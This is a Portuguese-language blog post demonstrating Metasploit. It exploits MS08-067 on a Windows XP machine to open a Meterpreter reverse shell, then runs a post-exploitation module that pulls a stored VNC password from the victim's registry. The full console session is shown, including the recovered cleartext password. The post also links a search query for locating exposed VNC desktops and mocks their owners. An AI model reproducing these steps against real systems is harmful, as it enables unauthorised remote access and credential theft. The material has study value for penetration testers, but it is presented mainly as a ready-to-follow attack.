<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/metasploit-logo.png"><img class="alignleft size-medium wp-image-2337" title="metasploit-logo" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/metasploit-logo-300x197.png" height="197" alt="" width="300" /></a><br /> Recentemente <a href="http://carnal0wnage.blogspot.com/">Chris Gate</a> escreveu sobre o <a href="http://carnal0wnage.blogspot.com/2011/03/vnc-passwords-and-metasploit-and-des.html">getvncpw</a>, está feature do payload <a href="http://www.nologin.org/Downloads/Papers/meterpreter.pdf">MSF Meterpreter</a> quebra o algoritmo DES de senhas do *VNC. </p> <p>Rob Fuller aka mubix reescreveu o módulo adicionando várias funcionalidades e melhorias, como ele ainda não está integrado ao MSF poderá ser baixado <strong><a href="http://www.room362.com/scripts-and-programs/metasploit/enum_vnc_pw.rb">AQUI</a></strong></p> <p><strong><br /> Vamos aos testes<br /> </strong></p> <blockquote><p> msf exploit(ms08_067_netapi) > exploit</p> <p>[*] Started reverse handler on 11.11.11.11:4444<br /> [*] Automatically detecting the target&#8230;<br /> [*] Fingerprint: Windows XP &#8211; Service Pack 3 &#8211; lang:Portuguese &#8211; Brazilian<br /> [*] Selected Target: Windows XP SP3 Portuguese &#8211; Brazilian (NX)<br /> [*] Attempting to trigger the vulnerability&#8230;<br /> [*] Sending stage (749056 bytes) to 11.11.11.11<br /> [*] Meterpreter session 2 opened (11.11.11.12:4444 -> 11.11.11.11:1032) at Mon Mar 21 15:57:38 -0300 2011 </p></blockquote> <blockquote><p> meterpreter > background </p></blockquote> <blockquote><p> msf exploit(ms08_067_netapi) > use post/windows/gather/enum_vnc_pw </p></blockquote> <blockquote><p> msf post(enum_vnc_pw) > set SESSION 1</p> <p>SESSION => 1 </p></blockquote> <blockquote><p> msf post(enum_vnc_pw) > run</p> <p>[*] Enumerating VNC passwords on VITIMA<br /> [*] Checking UltraVNC&#8230;<br /> [*] Checking WinVNC3_HKLM&#8230;<br /> [*] Checking WinVNC3_HKCU&#8230;<br /> [*] Checking WinVNC3_HKLM_Default&#8230;<br /> [*] Checking WinVNC3_HKCU_Default&#8230;<br /> [*] Checking WinVNC_HKLM_Default&#8230;<br /> [*] Checking WinVNC_HKCU_Default&#8230;<br /> [*] Checking WinVNC4_HKLM&#8230;<br /> <strong>[+] WinVNC4_HKLM => 2101f4d191cf99ca => DcLabsgays on port: </strong> &lt;== OLHE A SENHA AQUI ;-P<br /> [*] Checking WinVNC4_HKCU...<br /> [*] Checking RealVNC_HKLM...<br /> [*] Checking RealVNC_HKCU...<br /> [*] Checking TightVNC_HKLM...<br /> [*] Checking TightVNC_HKLM_Control_pass...<br /> [*] Post module execution completed<br /> msf post(enum_vnc_pw) > </p></blockquote> <p>Com certeza este é um excelente módulo. Cuidado com seus <a href="http://www.google.com/search?q=intitle%3A%E2%80%9DVNC+Desktop+%E2%80%9D+inurl%3A5800&amp;#038;ie=utf-8&amp;#038;oe=utf-8&amp;#038;aq=t&amp;#038;rls=org.mozilla:en-US:unofficial&amp;#038;client=iceweasel-a#sclient=psy&amp;#038;hl=en&amp;#038;client=iceweasel-a&amp;#038;rls=org.mozilla:en-US%3Aunofficial&amp;#038;source=hp&amp;#038;q=intitle:%E2%80%9DVNC+Desktop+%E2%80%9D+inurl%3A5800&amp;#038;aq=f&amp;#038;aqi=&amp;#038;aql=&amp;#038;oq=&amp;#038;pbx=1&amp;#038;bav=on.2,or.r_gc.r_pw.&amp;#038;fp=cc7bc17b6abe96b2">VNCs</a> jejejejejeje!!!!!</p> <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=2068&amp;lang=pt-br" class="crp_title">Usando o Nessus plugin com o MySQL e o db_autopwn no Metasploit</a></li><li><a href="http://blog.alexos.com.br/?p=1119&amp;lang=pt-br" class="crp_title">Quebre senhas online ( Updated )</a></li><li><a href="http://blog.alexos.com.br/?p=2180&amp;lang=pt-br" class="crp_title">Nessus Viewer</a></li><li><a href="http://blog.alexos.com.br/?p=1996&amp;lang=pt-br" class="crp_title">Brincando com o plugin do Nessus para o Metasploit</a></li><li><a href="http://blog.alexos.com.br/?p=18&amp;lang=pt-br" class="crp_title">Mozilla Firefox iframe.contentWindow.focus Deleted Object Reference Vulnerability</a></li></ul></div>